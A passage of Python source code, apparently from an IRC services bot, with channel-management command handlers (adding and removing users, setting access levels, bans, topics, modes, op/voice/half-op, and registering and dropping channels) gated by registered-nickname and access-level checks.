send_notice_as_chanop(self, nick, "ERROR: A level of 50 is required to kick users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_adduser(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if check_channel_access(conn, channel, nick) >= 150:
if len(params) >= 3:
adduser = params[2]
adduser = adduser.strip()
level = 100
if len(params) == 4:
try:
level = int(params[3])
if level >= 200:
level = 199
elif level < 1:
level = 1
except:
level = 100
else:
level = 100
results = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, adduser)
if results == True:
conn = create_connection("channels.db")
with conn:
ret = 0
ret = check_channel_access(conn, channel, adduser)
if ret == 0:
aop = 1
aov = 0
prot = 1
results = assign_access_list(conn, channel, adduser, level, aop, aov, prot)
send_notice_as_chanop(self, nick, "Added {} to {} with level {} access.".format(adduser, channel, str(level)))
else:
send_notice_as_chanop(self, nick, "ERROR: {} already has access to {}.".format(adduser, channel))
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(adduser))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for adduser: <username> <level>")
send_notice_as_chanop(self, nick, "The level is optional and between 1-199.")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 150 is required to add users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_setuser(self, prefix, command, params):
setuser = ""
setuser_l = ""
cmd = ""
state = ""
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
level = check_channel_access(conn, channel, nick)
if level >= 150:
if len(params) >= 5:
cmd = params[3]
state = params[4].strip()
setuser = params[2]
if setuser == nick:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You cannot modify your own access level.")
return
try:
setuser_l = check_channel_access(conn, channel, setuser)
except:
print("{} has no channel access\n".format(setuser))
results = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, setuser)
if results == True:
conn = create_connection("channels.db")
with conn:
if cmd == 'level':
try:
lvl = params[4].strip()
except:
pass
if lvl.isnumeric():
lvl = int(lvl)
if lvl < level:
set_user_level(conn, chan, setuser, lvl)
self.send_msg_as("chanop", "NOTICE", nick, "Set user access level for {} to {}.\n".format(setuser,lvl))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: Cannot set user to a level higher than your access level of {}.".format(level))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> level <1-{}>".format(level-1))
elif setuser_l <= level and setuser_l != 0:
if cmd == 'prot':
if state == 'on' or state == 'off':
set_prot_channel_state(conn, chan, setuser, state)
self.send_msg_as("chanop", "NOTICE", nick, "Set user {} setting {} {}.\n".format(setuser, cmd.upper(), state.upper()))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
elif cmd == 'aov':
if state == 'on' or state == 'off':
set_aov_channel_state(conn, chan, setuser, state)
self.send_msg_as("chanop", "NOTICE", nick, "Set user {} setting {} {}.\n".format(setuser, cmd.upper(), state.upper()))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
elif cmd == 'aop':
if state == 'on' or state == 'off':
set_aop_channel_state(conn, chan, setuser, state)
self.send_msg_as("chanop", "NOTICE", nick, "Set user {} setting {} {}.\n".format(setuser, cmd.upper(), state.upper()))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> level <1-{}>".format(level-1))
elif setuser_l == 0:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} does not have access to {}.\n".format(setuser, chan))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: Cannot modify {}'s settings as they have higher channel access than you.\n".format(setuser))
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(setuser))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> <prot/aop/aov> <on/off>")
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for setuser: <username> level <1-{}>".format(level-1))
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 150 is required to set users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_deluser(self, prefix, command, params):
deluser = ""
deluser_l = ""
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
level = check_channel_access(conn, channel, nick)
if level >= 150:
if len(params) >= 3:
deluser = params[2].strip()
try:
deluser_l = check_channel_access(conn, channel, deluser)
except:
print("{} has no channel access\n".format(deluser))
results = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, deluser)
if results == True:
conn = create_connection("channels.db")
with conn:
if deluser == nick:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You can't delete yourself.\n")
elif deluser_l < level and deluser_l != 0:
self.send_msg_as("chanop", "NOTICE", nick, "Deleted user {}.\n".format(deluser))
delete_user_from_chan(conn, chan, deluser)
elif deluser_l == 0:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} does not have access to {}.\n".format(deluser, chan))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: Cannot delete {} as they have higher access than you.\n".format(deluser))
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(deluser))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for deluser: <username>")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 150 is required to delete users.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_topic(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
conn = create_connection("users.db")
title = ""
try:
if params[2]:
title = ' '.join(params[2:])
except:
title = ""
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if check_channel_access(conn, channel, nick) >= 100:
try:
if params[2]:
self.send_msg_as("chanop", "TOPIC", channel, "{}\n".format(title))
set_channel_topic(conn, channel, title)
except:
send_notice_as_chanop(self, nick, "ERROR: You must specify a channel topic.")
else:
send_notice_as_chanop(self, nick, "ERROR: A level of 100 is required to use the topic command.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_ban(self, prefix, command, params):
chkid = 0
channel = params[0]
chan = channel[1:]
target = None
if len(params) > 2:
target = params[2].strip()
nick = prefix[1:]
try:
uid = nick_to_uid(self, target)
except:
uid = None
conn = create_connection("users.db")
with conn:
result = check_nickname_exists(conn, nick)
if result == True:
if target != None:
chkid = check_nickname_identified(conn, target)
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if params[1] == ":`ban\r\n" and len(params) < 3:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: SYNTAX for ban is: <user|banmask> [-h|-uh|-nuh] [reason]")
else:
if check_channel_access(conn, channel, nick) >= 100:
if uid == None:
nickname = target
if '*' not in target:
vhost = nickname + "!*@*"
else:
vhost = target
sendserv = ":00000000A MODE {} +b {}\r\n".format(channel, vhost)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
bancount = len( self.chans[chan].bans )
self.chans[chan].bans.append( HostList(vhost, bancount))
else:
modes = 'nuh'
if len(params) == 4:
if params[3].strip() == '-uh' or params[3].strip() == '-h' or params[3].strip() == '-nuh':
mode = params[3].strip()
modes = mode[1:]
else:
reason = params[3].strip()
hst = self.users[uid].GetHost()
ident = self.users[uid].GetIndent()
nickname = self.users[uid].GetNick()
chkprot = check_prot_status(conn, chan, target)
lvlban = check_channel_access(conn, channel, nick)
lvltarget = check_channel_access(conn, channel, target)
if lvlban < lvltarget and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be banned".format(target))
return
else:
ipchk = re.search(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', hst)
if ipchk:
hst = self.users[uid].GetVHost()
fullhost = nickname + '!' + ident + '@' + hst
print(f"mode is: {modes}")
print(f"host is: {fullhost}")
vhost = gethost(modes, fullhost)
if vhost == None:
vhost = nickname + "!*@*"
sendserv = ":00000000A MODE {} +b {}\r\n".format(channel,vhost)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
bindex = len( self.chans[chan].bans )
self.chans[chan].bans.append(HostList( vhost, bindex))
print("Added ban host: {}".format(vhost))
try:
if self.chans[chan].ison(uid):
reason = f"Requested by {nick}"
if len(params) >= 5:
reason = " ".join(params[4:])
data = ":00000000A KICK {} {} :{}\n".format(channel, target, reason)
print(data)
self.sockssl.send(data.encode('ascii'))
del self.chans[chan].onlist[uid]
print(f"Deleted uid {uid} from chan: {channel}")
except:
pass
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You require at least 100 channel access to use this command.")
else:
send_notice_as_chanop(self, nick, "ERROR: {} is not a registered channel.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: {} is not a registered nickname.".format(nick))
def process_chanop_listban(self, prefix, command, params):
channel = params[0]
chan = channel[1:]
nick = prefix[1:]
totalbans = len( self.chans[chan].bans )
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if totalbans > 0:
self.send_msg_as("chanop", "NOTICE", nick, f"*** {channel} Ban List ({totalbans}) ***")
for i in range(0,totalbans):
self.send_msg_as("chanop", "NOTICE", nick, f"-- {i + 1} - {self.chans[chan].bans[i].host}")
self.send_msg_as("chanop", "NOTICE", nick, f"*** End of List ***")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: There are no bans for this channel")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: You require at least 100 channel access to use this command.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {channel} is not a registered channel.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} has not identified to services.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} is not a registered nickname.")
def process_chanop_unban(self, prefix, command, params):
channel = params[0]
chan = channel[1:]
nick = prefix[1:]
totalbans = len( self.chans[chan].bans )
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if len(params) == 3:
totalbans = len( self.chans[chan].bans )
if totalbans > 0 and params[2] == '*\r\n':
wq = [ban.host for ban in self.chans[chan].bans]
self.chans[chan].bans.clear()
print(wq)
# remove bans in batches of six, matching the six-mode limit used elsewhere
for i in range(0, len(wq), 6):
    bq = wq[i:i + 6]
    chanop_set_mode(self, channel, "-" + "b" * len(bq), " ".join(bq))
elif totalbans > 0 and '@' in params[2]:
target = params[2].strip()
for ban in reversed(self.chans[chan].bans):
if ban.host == target:
chanop_set_mode(self, channel, "-b", "{}".format(target))
self.chans[chan].bans.remove(ban)
break
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: There are no bans matching that mask on this channel")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: SYNTAX for unban: <banmask|*>")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: You require at least 100 channel access to use this command.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {channel} is not a registered channel.")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} has not identified to services.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, f"ERROR: {nick} is not a registered nickname.")
def process_chanop_set(self, prefix, command, params):
channel = params[0]
chan = channel[1:]
nick = prefix[1:]
nmode = False
pmode = False
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
if len(params) >= 3:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
if ret >= 100:
validmodes = "ntpims"
pmodes = []
nmodes = []
print("process set")
if len(params) == 4 and params[2] == "modes":
foundmodes = params[3].strip()
pmode = True if foundmodes[:1] == '+' else False
if pmode:
nmode = False
for mode in foundmodes:
if mode in validmodes:
if pmode:
pmodes.append(mode)
if nmode:
nmodes.append(mode)
if mode == '+':
pmode = True
nmode = False
if mode == '-':
nmode = True
pmode = False
modestr = ""
if len(pmodes) > 0:
modestr = "+" + "".join(pmodes)
if len(nmodes) > 0:
modestr = modestr + "-" + "".join(nmodes)
if len(modestr) > 0:
conn = create_connection("channels.db")
with conn:
set_channel_modes(conn, channel, modestr)
sendserv = ":{} MODE {} {}\n".format("00000000A",channel,modestr)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
self.send_msg_as("chanop", "NOTICE", nick, "Set channel mode to: {}\n".format(modestr))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: SYNTAX for set: <modes> [+ntpims|-ntpims]")
self.send_msg_as("chanop", "NOTICE", nick, "For example: set modes +nt-pims")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 100 access to use this command.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: SYNTAX for set: <modes> [+ntpims|-ntpims]")
self.send_msg_as("chanop", "NOTICE", nick, "For example: set modes +nt-pims")
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_priv_halfopdehalfop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
lvlopper = 0
lvldehalfop = 0
nick = uid_to_nick(self, prefix[1:])
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
if len(params) >= 3:
channel = params[2].lower().strip()
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) == 3 or (len(params) == 4 and params[3] == '\r\n'):
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
ret = prefix[1:]
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
self.chans[chan].onlist[ret] = mod + "%"
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "dehalfop" in params[1]:
strrep = mod
strrep = strrep.replace("%","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif len(params) >= 4:
chan = channel[1:]
conn = create_connection("users.db")
tbuffer = []
with conn:
voiceusers = map(str.strip, params[3:])
queue_buffer = []
for user in voiceusers:
chkid = 0
conn = create_connection("users.db")
ret = nick_to_uid(self, user)
chkid = check_nickname_identified(conn, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
print("Adding % to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "%"
elif chkmod != -1 and "dehalfop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldevoiced = check_channel_access(conn, channel, user)
if lvldevoiced > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be removed as half-op.\n".format(user))
continue
else:
print("Removing % from user: {}".format(user))
mod = mod.replace("%","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "dehalfop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not half-opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(''.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 75 access to use this command.\n")
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
else:
send_notice_as_chanop(self, nick, "ERROR: SYNTAX for halfop/dehalfop: /msg ChanOP HALFOP/DEHALFOP #channel [users]")
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_priv_voicedevoice(self, prefix, command, params):
    conn = create_connection("users.db")
    channel = params[0].strip()
    lvlopper = 0
    lvldeopped = 0
    nick = uid_to_nick(self, prefix[1:])
    with conn:
        results = check_nickname_exists(conn, nick)
        if results == True:
            if check_nickname_identified(conn, nick) == True:
                if len(params) >= 3:
                    channel = params[2].lower().strip()
                    conn = create_connection("channels.db")
                    ret = check_channel_registered(conn, channel)
                    if ret == True:
                        ret = 0
                        ret = check_channel_access(conn, channel, nick)
                        lvlopper = ret
                        if ret >= 75:
                            if len(params) == 3 or (len(params) == 4 and params[3] == '\r\n'):
                                if "devoice" in params[1]:
                                    modes = "-"
                                else:
                                    modes = "+"
                                ret = prefix[1:]
                                if ret is not None:
                                    chan = channel[1:]
                                    mod = getmodes(self, nick, chan)
                                    chkmod = mod.find("+")
                                    if chkmod == -1 and "devoice" not in params[1]:
                                        self.chans[chan].onlist[ret] = mod + "+"
                                        sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
                                        print(sendserv)
                                        self.sockssl.send(sendserv.encode('ascii'))
                                    elif chkmod != -1 and "devoice" in params[1]:
                                        strrep = mod
                                        strrep = strrep.replace("+","")
                                        self.chans[chan].onlist[ret] = strrep
                                        sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
                                        print(sendserv)
                                        self.sockssl.send(sendserv.encode('ascii'))
                            elif len(params) >= 4:
                                chan = channel[1:]
                                conn = create_connection("users.db")
                                tbuffer = []
                                with conn:
                                    voiceusers = map(str.strip, params[3:])
                                    queue_buffer = []
                                    for user in voiceusers:
                                        chkid = 0
                                        conn = create_connection("users.db")
                                        ret = nick_to_uid(self, user)
                                        chkid = check_nickname_identified(conn, user)
                                        if ret is not None:
                                            mod = getmodes(self, user, chan)
                                            chkmod = mod.find("+")
                                            if chkmod == -1 and "devoice" not in params[1]:
                                                print("Adding + to user: {}".format(user))
                                                self.chans[chan].onlist[ret] = mod + "+"
                                            elif chkmod > 0 and "devoice" in params[1]:
                                                conn = create_connection("channels.db")
                                                with conn:
                                                    chkprot = check_prot_status(conn, chan, user)
                                                    lvldevoiced = check_channel_access(conn, channel, user)
                                                    if lvldevoiced > lvlopper and chkprot == 1 and chkid:
                                                        self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be devoiced.\n".format(user))
                                                        continue
                                                    else:
                                                        print("Removing + from user: {}".format(user))
                                                        mod = mod.replace("+","")
                                                        self.chans[chan].onlist[ret] = mod
                                            elif chkmod == -1 and "devoice" in params[1]:
                                                self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not voiced on {}.\n".format(user, channel))
                                                continue
                                            tbuffer.append(user)
                                            if len(tbuffer) == 6:
                                                if "devoice" in params[1]:
                                                    modes = "-"
                                                else:
                                                    modes = "+"
                                                data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
                                                queue_buffer.append(data)
                                                print(data)
                                                tbuffer = []
                                    if len(tbuffer) > 0:
                                        if "devoice" in params[1]:
                                            modes = "-"
                                        else:
                                            modes = "+"
                                        data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
                                        print(data)
                                        queue_buffer.append(data)
                                    self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
                                    tbuffer = []
                                    queue_buffer = []
                                    data = []
                        else:
                            self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 75 access to use this command.\n")
                    else:
                        self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
                else:
                    send_notice_as_chanop(self, nick, "ERROR: SYNTAX for voice/devoice: /msg ChanOP VOICE/DEVOICE #channel [users]")
            else:
                self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
        else:
            self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_priv_opdeop(self, prefix, command, params):
    conn = create_connection("users.db")
    channel = params[0].strip()
    lvlopper = 0
    lvldeopped = 0
    nick = uid_to_nick(self, prefix[1:])
    with conn:
        results = check_nickname_exists(conn, nick)
        if results == True:
            if check_nickname_identified(conn, nick) == True:
                if len(params) >= 3:
                    channel = params[2].lower().strip()
                    conn = create_connection("channels.db")
                    ret = check_channel_registered(conn, channel)
                    if ret == True:
                        ret = 0
                        ret = check_channel_access(conn, channel, nick)
                        lvlopper = ret
                        if ret >= 100:
                            if len(params) == 3 or (len(params) == 4 and params[3] == '\r\n'):
                                if "deop" in params[1]:
                                    modes = "-"
                                else:
                                    modes = "+"
                                ret = prefix[1:]
                                if ret is not None:
                                    chan = channel[1:]
                                    mod = getmodes(self, nick, chan)
                                    chkmod = mod.find("@")
                                    if chkmod == -1 and "deop" not in params[1]:
                                        self.chans[chan].onlist[ret] = mod + "@"
                                        sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
                                        print(sendserv)
                                        self.sockssl.send(sendserv.encode('ascii'))
                                    elif chkmod != -1 and "deop" in params[1]:
                                        strrep = mod
                                        strrep = strrep.replace("@","")
                                        self.chans[chan].onlist[ret] = strrep
                                        sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
                                        print(sendserv)
                                        self.sockssl.send(sendserv.encode('ascii'))
                            elif len(params) >= 4:
                                chan = channel[1:]
                                conn = create_connection("users.db")
                                tbuffer = []
                                with conn:
                                    opusers = map(str.strip, params[3:])
                                    queue_buffer = []
                                    for user in opusers:
                                        chkid = 0
                                        conn = create_connection("users.db")
                                        ret = nick_to_uid(self, user)
                                        chkid = check_nickname_identified(conn, user)
                                        if ret is not None:
                                            mod = getmodes(self, user, chan)
                                            chkmod = mod.find("@")
                                            if chkmod == -1 and "deop" not in params[1]:
                                                print("Adding @ to user: {}".format(user))
                                                self.chans[chan].onlist[ret] = mod + "@"
                                            elif chkmod > 0 and "deop" in params[1]:
                                                conn = create_connection("channels.db")
                                                with conn:
                                                    chkprot = check_prot_status(conn, chan, user)
                                                    lvldeopped = check_channel_access(conn, channel, user)
                                                    if lvldeopped > lvlopper and chkprot == 1 and chkid:
                                                        self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be deopped.\n".format(user))
                                                        continue
                                                    else:
                                                        print("Removing @ from user: {}".format(user))
                                                        mod = mod.replace("@","")
                                                        self.chans[chan].onlist[ret] = mod
                                            elif chkmod == -1 and "deop" in params[1]:
                                                self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not opped on {}.\n".format(user, channel))
                                                continue
                                            tbuffer.append(user)
                                            if len(tbuffer) == 6:
                                                if "deop" in params[1]:
                                                    modes = "-"
                                                else:
                                                    modes = "+"
                                                data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
                                                queue_buffer.append(data)
                                                print(data)
                                                tbuffer = []
                                    if len(tbuffer) > 0:
                                        if "deop" in params[1]:
                                            modes = "-"
                                        else:
                                            modes = "+"
                                        data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
                                        print(data)
                                        queue_buffer.append(data)
                                    self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
                                    tbuffer = []
                                    queue_buffer = []
                                    data = []
                        else:
                            self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You need at least 100 access to use this command.\n")
                    else:
                        self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not a registered channel.\n".format(channel))
                else:
                    send_notice_as_chanop(self, nick, "ERROR: SYNTAX for op: /msg ChanOP OP #channel [users]")
            else:
                self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
        else:
            self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_register(self, prefix, command, params):
    username = uid_to_nick(self, prefix[1:])
    if username:
        conn = create_connection("users.db")
        with conn:
            result = check_nickname_exists(conn, username)
            if result == True:
                if check_nickname_identified(conn, username) == True:
                    chan = params[2].strip()
                    chk_chan = re.search("^#.+", chan)
                    if chk_chan:
                        result = False
                        conn = create_connection("channels.db")
                        with conn:
                            result = check_channel_registered(conn, params[2].strip())
                            if result == False:
                                channel = chan[1:]
                                try:
                                    isop = self.chans[channel].isop_uid(prefix[1:])
                                except (KeyError, AttributeError):
                                    # Channel not known locally or no op list yet
                                    isop = False
                                if isop == True:
                                    register_channel(conn, params[2].strip(), username, "", "")
                                    ret = create_access_list(conn, chan)
                                    ret = assign_access_list(conn, chan, username, 200, 1, 0, 1)
                                    sendserv = ":{} SJOIN {} {} + :00000000A\n".format(SERVICES_HEXCODE, str(int(time.time())), params[2].strip())
                                    print(sendserv)
                                    self.sockssl.send(sendserv.encode('ascii'))
                                    sendserv = ":00000000A MODE {} +aornt 00000000A 00000000A\n".format(params[2].strip())
                                    print(sendserv)
                                    self.sockssl.send(sendserv.encode('ascii'))
                                else:
                                    self.send_msg_as("chanop", "NOTICE", username, "ERROR: You must be a channel operator to register the channel.\n")
                            else:
                                sendserv = ":00000000A NOTICE {} :ERROR: Channel already registered.\n".format(username)
                                print(sendserv)
                                self.sockssl.send(sendserv.encode('ascii'))
                    else:
                        sendserv = ":00000000A NOTICE {} :ERROR: Not a valid channel name.\n".format(username)
                        print(sendserv)
                        self.sockssl.send(sendserv.encode('ascii'))
                else:
                    self.send_msg_as("chanop", "NOTICE", username, "ERROR: {} has not identified to services.\n".format(username))
            else:
                sendserv = ":00000000A NOTICE {} :ERROR: {} is not a registered nickname.\n".format(username, username)
                print(sendserv)
                self.sockssl.send(sendserv.encode('ascii'))
def process_chanop_drop(self, prefix, command, params):
    # Resolve the nick first so it is available for the syntax-error notice too
    username = uid_to_nick(self, prefix[1:])
    if len(params) > 2 and params[2]:
        if username:
            conn = create_connection("users.db")
            with conn:
                result = check_nickname_exists(conn, username)
                if result == True:
                    if check_nickname_identified(conn, username) == True:
                        chan = params[2].strip()
                        chk_chan = re.search("^#.+", chan)
                        if chk_chan:
                            result = False
                            conn = create_connection("channels.db")
                            with conn:
                                result = check_channel_registered(conn, params[2].strip())
                                if result == True:
                                    owner = get_channel_owner(conn, chan)
                                    if owner == username:
                                        drop_channel(conn, chan)
                                        sendserv = ":00000000A PART {}\n".format(chan)
                                        print(sendserv)
                                        self.sockssl.send(sendserv.encode('ascii'))
                                        self.send_msg_as("chanop", "NOTICE", username, "Channel {} has been dropped.\n".format(chan))
                                    else:
